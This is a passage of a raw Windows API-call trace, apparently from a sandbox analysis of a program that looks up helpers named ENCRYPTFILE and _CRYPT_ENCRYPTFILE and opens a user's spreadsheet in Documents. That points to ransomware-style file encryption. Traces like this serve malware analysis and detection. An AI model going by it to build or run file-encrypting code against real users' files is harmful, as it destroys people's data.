wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0083.087] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0083.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0083.088] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.088] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.088] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x150) returned 0x43ccec8 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0083.089] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.090] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0083.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0083.090] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b95160, ftCreationTime.dwHighDateTime=0x1d5ea67, ftLastAccessTime.dwLowDateTime=0xe909a60, ftLastAccessTime.dwHighDateTime=0x1d5f008, ftLastWriteTime.dwLowDateTime=0xe909a60, ftLastWriteTime.dwHighDateTime=0x1d5f008, nFileSizeHigh=0x0, nFileSizeLow=0x14a89, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="ul2gt2Lt.xlsx", cAlternateFileName="UL2GT2~1.XLS")) returned 0x41ac000 [0083.090] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0083.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0083.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0083.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0083.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0083.091] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0083.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0083.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0083.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0083.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0083.091] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0083.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0083.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0083.092] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0083.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0083.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0083.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0083.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0083.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a10 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0083.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0083.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0083.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0083.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0083.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0083.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0083.095] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0083.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0083.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0083.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0083.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0083.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0083.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0083.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0083.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.098] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0083.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c3698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0083.099] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\ul2gt2lt.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0083.099] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb1c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0083.099] CloseHandle (hObject=0x298) returned 1 [0083.099] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.099] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: 